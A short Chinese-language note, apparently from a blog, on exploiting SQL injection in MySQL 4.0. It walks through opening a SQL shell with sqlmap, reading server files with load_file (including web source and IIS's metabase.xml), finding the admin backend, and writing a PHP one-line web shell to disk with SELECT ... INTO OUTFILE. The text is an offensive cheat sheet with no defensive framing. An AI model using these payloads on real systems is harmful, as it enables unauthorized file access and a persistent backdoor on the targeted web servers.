注入漏洞
基本信息
database():数据库名
version():数据库版本
user():数据库用户
@@version_compile_os:操作系统
=========================================
mysql 4.0注入
1.利用sqlmap注入读取文件
2.查询表名称
3.进行查询
找到注入点之后
我们sqlmap.py -u " " --sql-shell (这样可以执行sql语句)
我们使用select load_file('home/webroot/cw/index.php')
等到我们读到了新文件,我们再去寻找,依次这样找到管理目录
比如后台是如何验证的,然后根据字段和表名查询数据库
如果是03的话,并且是IIs的容器的话,我们可以先读取C:/windows/system32/metabase.xml
接着我们再找寻Inetpub这个目录,这是作为IIs的根目录
在读的时候把/更改为了\\
--------------------------------------------------------
写入文件
select 1,"<?php
@eval($_POST['1']);
?>",3,4,5,...into outfile '里面填写的绝对路径必须得知'(可通过上面的load_file)

浙公网安备 33010602011771号